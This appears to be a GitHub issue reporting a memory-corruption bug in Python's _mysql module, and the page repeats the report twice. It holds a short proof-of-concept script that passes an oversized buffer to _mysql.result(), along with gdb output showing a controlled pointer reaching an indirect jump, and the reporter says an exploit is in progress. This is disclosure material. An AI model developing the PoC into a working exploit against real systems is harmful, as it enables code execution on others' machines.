You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
Hello.
I found a vulnerability in _mysql module.
PoC below:
#!/usr/bin/python2.7
import _mysql
RDX=0x66666666
payload="A"*2048
_mysql.result(payload,RDX)
It's exploitable bug, I'm working on exploit.
(gdb) run mysql.py
Starting program: /usr/bin/python2.7 mysql.py
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/usr/lib/libthread_db.so.1".
Program received signal SIGSEGV, Segmentation fault.
0x00007ffff38e7f3c in mysql_use_result () from /usr/lib/libmysqlclient.so.18
(gdb) info reg
rax 0x4141414141414141 4702111234474983745
rbx 0x7ffff7e91b90 140737352637328
rcx 0x0 0
rdx 0x66666666 1717986918
rsi 0x7ffff7eb1ec0 140737352769216
rdi 0x5555557f9890 93824995006608
rbp 0x7fffffffe120 0x7fffffffe120
rsp 0x7fffffffe0a8 0x7fffffffe0a8
r8 0x7fffffffdd00 140737488346368
r9 0x7fffffffdd80 140737488346496
r10 0x5555557824f0 93824994518256
r11 0x2 2
r12 0x5555557560a0 93824994336928
r13 0x0 0
r14 0x7ffff7e939c7 140737352645063
r15 0x7ffff7e91b90 140737352637328
rip 0x7ffff38e7f3c 0x7ffff38e7f3c <mysql_use_result+12>
eflags 0x10206 [ PF IF RF ]
cs 0x33 51
ss 0x2b 43
ds 0x0 0
es 0x0 0
fs 0x0 0
gs 0x0 0
(gdb) disas $rip
Dump of assembler code for function mysql_use_result:
0x00007ffff38e7f30 <+0>: push %rbp
0x00007ffff38e7f31 <+1>: mov 0x4d0(%rdi),%rax
0x00007ffff38e7f38 <+8>: mov %rsp,%rbp
0x00007ffff38e7f3b <+11>: pop %rbp
=> 0x00007ffff38e7f3c <+12>: mov 0x18(%rax),%rax
0x00007ffff38e7f40 <+16>: jmpq *%rax
End of assembler dump.
(gdb)
The text was updated successfully, but these errors were encountered:
Hello.
I found a vulnerability in _mysql module.
PoC below:
#!/usr/bin/python2.7
import _mysql
RDX=0x66666666
payload="A"*2048
_mysql.result(payload,RDX)
It's exploitable bug, I'm working on exploit.
(gdb) run mysql.py
Starting program: /usr/bin/python2.7 mysql.py
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/usr/lib/libthread_db.so.1".
Program received signal SIGSEGV, Segmentation fault.
0x00007ffff38e7f3c in mysql_use_result () from /usr/lib/libmysqlclient.so.18
(gdb) info reg
rax 0x4141414141414141 4702111234474983745
rbx 0x7ffff7e91b90 140737352637328
rcx 0x0 0
rdx 0x66666666 1717986918
rsi 0x7ffff7eb1ec0 140737352769216
rdi 0x5555557f9890 93824995006608
rbp 0x7fffffffe120 0x7fffffffe120
rsp 0x7fffffffe0a8 0x7fffffffe0a8
r8 0x7fffffffdd00 140737488346368
r9 0x7fffffffdd80 140737488346496
r10 0x5555557824f0 93824994518256
r11 0x2 2
r12 0x5555557560a0 93824994336928
r13 0x0 0
r14 0x7ffff7e939c7 140737352645063
r15 0x7ffff7e91b90 140737352637328
rip 0x7ffff38e7f3c 0x7ffff38e7f3c <mysql_use_result+12>
eflags 0x10206 [ PF IF RF ]
cs 0x33 51
ss 0x2b 43
ds 0x0 0
es 0x0 0
fs 0x0 0
gs 0x0 0
(gdb) disas $rip
Dump of assembler code for function mysql_use_result:
0x00007ffff38e7f30 <+0>: push %rbp
0x00007ffff38e7f31 <+1>: mov 0x4d0(%rdi),%rax
0x00007ffff38e7f38 <+8>: mov %rsp,%rbp
0x00007ffff38e7f3b <+11>: pop %rbp
=> 0x00007ffff38e7f3c <+12>: mov 0x18(%rax),%rax
0x00007ffff38e7f40 <+16>: jmpq *%rax
End of assembler dump.
(gdb)
The text was updated successfully, but these errors were encountered: